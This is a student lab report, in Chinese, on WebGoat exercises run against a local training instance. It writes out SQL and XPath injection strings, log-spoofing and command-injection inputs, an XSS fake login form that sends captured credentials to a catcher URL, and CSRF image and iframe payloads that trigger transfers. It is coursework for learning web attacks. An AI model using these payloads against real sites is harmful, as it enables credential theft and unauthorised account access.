20155313 杨瀚 《网络对抗技术》实验九 Web安全基础
一、实验目的
- 本实践的目标理解常用网络攻击技术的基本原理。Webgoat实践下相关实验。
二、基础问题回答
-
1.SQL注入攻击原理,如何防御
-
答:SQL注入攻击是黑客对数据库进行攻击的常用手段之一。随着B/S模式应用开发的发展,使用这种模式编写应用程序的程序员也越来越多。但是由于程序员的水平及经验也参差不齐,相当大一部分程序员在编写代码的时候,没有对用户输入数据的合法性进行判断,使应用程序存在安全隐患。用户可以提交一段数据库查询代码,根据程序返回的结果,获得某些他想得知的数据,这就是所谓的SQL Injection,即SQL注入。
-
2.XSS攻击的原理,如何防御
-
答:XSS攻击全称跨站脚本攻击,是为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS,XSS是一种在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。
-
3.CSRF攻击原理,如何防御
-
答:CSRF(Cross-site request forgery)跨站请求伪造,也被称为“One Click Attack”或者Session Riding,通常缩写为CSRF或者XSRF,是一种对网站的恶意利用。尽管听起来像跨站脚本(XSS),但它与XSS非常不同,XSS利用站点内的信任用户,而CSRF则通过伪装来自受信任用户的请求来利用受信任的网站。与XSS攻击相比,CSRF攻击往往不大流行(因此对其进行防范的资源也相当稀少)和难以防范,所以被认为比XSS更具危险性。
三、实验内容
第一阶段
-
1.首先我们来安装一个学习系统
Webgoat,然后在里面来进行网络攻击操作。我们先在同学给出的百度云上下载这个压缩包,然后拷入kali中,并在压缩包目录中使用java -jar webgoat-container-7.1-exec.jar这条指令。 -
-
等到安装完成以后会显示正在启动,这时候我们就可以在浏览器中运行Webgoat了。
-
-
然后我们在浏览器中输入
localhost:8080/WebGoat(注意大小写,不然进不去哟)就可以进入这个学习系统。 -
-
进入学习系统以后我们可以看到左侧的学习内容。
-
-
2.进入学习系统以后我们先进行
String SQL Injection(字符串数据库注入?),首先我们在那个文本框里输入Smith,然后在下面会显示Smith的资料。 -
-
然后根据文本框下面的数据库语言,我们在文本框中输入
'or 1='1,即在数据库语言中形成了名字=''(空集,即所有)or 1=’1(永真式)的判断,结果是会显示所有的用户信息。 -
-
3.然后我们进行
Log Spoofing(日志伪造),我们通过注入恶意字符串,按照规则伪造出一条登陆成功的日志并实现登陆。 -
首先我们先在文本框中输入登录名
yh,但是我们并不知道密码,所以我们随意输入一个密码,显然登录失败。 -
-
然后我们尝试使用
yh%0d%0aLogin Succeeded for username: admin输入在登陆名里,密码随意输入,结果显示用户名yh登录失败,但是admin登陆成功。 -
-
4.接下来我们进行
XPATH Injection(XML路径语言注入?),我们选择一个XML节点,并在不知道用户名和密码的情况下在用户名和密码中分别输入yh' or 1=1 or 'a'='a和yh,然后可以看到攻击成功。
-
5.再接下来我们进行
LAB: SQL Injection中的第一项String SQL Injection。我们的目的是使用数据库注入来绕过身份验证,即不需要密码就可以登陆。 -
参考同学的博客,使用用户Nevile进行登陆,在密码栏中输入
' or 1=1 --,但是登录失败。因为查看该网页源代码中显示,这个文本框最多只能输入8个字符。我尝试使用上一个数据库注入的代码’or 1='1,刚好8个字符,结果竟然成功了? -
-
-
6.再然后我们进行
LAB: SQL Injection中的第三项Numeric SQL Injection(数字数据库注入)。我们的目的是通过注入语句浏览到原本无法浏览的信息,通过一个员工Larry,浏览到Boss的账户信息。我们先在上一题中登陆Larry的账户。 -
然后我们按f12打开网页源代码,如下图中将value=101(即Larry的ID)修改成
101 or 1=1 order by salary desc --,这是一种将工资由高到低的一种排序,这样就会在数据库里查找账户数据的时候,第一个查看到老板的账户信息。 -
-
结果是我登陆Larry的账户但是却查看到了老板的信息。
-
-
7.接着我们进行
Database Backdoors(数据库后门)。首先我们输入101查看自己的账户信息。 -
-
接下来使用SQL语句
101; update employee set salary=20155313进行修改,将薪水修改成20155313? -
-
8.最后我们来做
Command Injection(命令注入)。我们通过修改网站源代码来访问本地计算机建立的IP以及系统的网络端口使用情况以及IP地址,尝试注入netstat -an以及ifconfig这两个系统命令。我们在下图源代码的位置添加"& netstat -an & ipconfig"。 -
-
然后我们在上面的选择框中选择第二项,即我们修改过的选项。
-
-
结果我们可以成功查看IP和端口的信息。
-
第二阶段
- 1.接下来我们进行XSS跨站脚本攻击,首先我们尝试
Phishing with XSS(跨站脚本仿冒攻击)。我们的目的是在一个具有XSS漏洞的页面中,利用XSS和HTML注入达到这些目标。参考提示我们尝试向搜索字段添加HTML以创建假身份验证表单,参照同学的博客我们得到以下代码。
</form>
<script>
function hack(){
XSSImage=new Image;
XSSImage.src="http://localhost:8080/WebGoat/catcher?PROPERTY=yes&user=" + document.phish.user.value + "&password=" + document.phish.pass.value + "";
alert("Had this been a real attack... Your credentials were just stolen. User Name = " + document.phish.user.value + " Password = " + document.phish.pass.value);
}
</script>
<form name="phish">
<br>
<br>
<HR>
<H2>This feature requires account login:</H2>
<br>
<br>Enter Username:<br>
<input type="text" name="user">
<br>Enter Password:<br>
<input type="password" name = "pass">
<br>
<input type="submit" name="login" value="login" onclick="hack()">
</form>
<br>
<br>
<HR>
-
我们将以上代码输入到搜索框中并点击搜索,我们就会看到该代码的运行结果,然后我们在用户名和密码一栏输入我们的账户信息,(假装是正确的)结果我们会看到我们输入的内容被弹窗显示了出来。
-
-
2.接下来我们尝试进行
Stored XSS Attacks(跨站脚本存储攻击)。我们的目的是在这个sumit的操作上添加一个html的标签。这很简单,我们在Title中随意输入一个抬头,然后在Message中输入<script>alert("20155313");</script>一个script的弹窗模块即可完成。 -
-
-
3.最后我们尝试进行
Reflected XSS Attacks(跨站脚本反射攻击)。我们在第一个输入文本框随意输入一个银行卡卡号(输入的当然是假的咯),然后输入银行卡最后三位验证码的输入文本框中输入<script>alert("20155313");</script>,然后点击购买就会显示弹窗,但是同时会显示购买成功?所以你只要知道别人的银行卡卡号就可以随便买东西咯? -
第三阶段
-
1.最后我们来进行CSRF跨站请求伪造攻击。首先我们尝试的是
Cross Site Request Forgery(CSRF),我们的目的是发送一段包含恶意代码的图片,然后通过设置让被攻击者看不到这个图片。我们在message中输入<img src='attack?Screen=src值&menu=menu值&transferFunds=转账数额' width='1' height='1'>这个格式,其中的src和mune的值参考下面的表格。 -
-
-
提交以后点击下面的bonsai按钮刷新以后就会显示攻击成功。
-
2.最后的最后我们进行
CSRF Prompt By-Pass(绕过CSRF确认攻击)。我们在message的文本框中输入下面的代码,其中的src和menu值参考下面的表格。
<iframe src="attack?Screen=src值&menu=menu值&transferFunds=CONFIRM"> </iframe>```
- 
- 
- 点击提交以后点击下面的Title名就会显示下面攻击成功的界面。
- 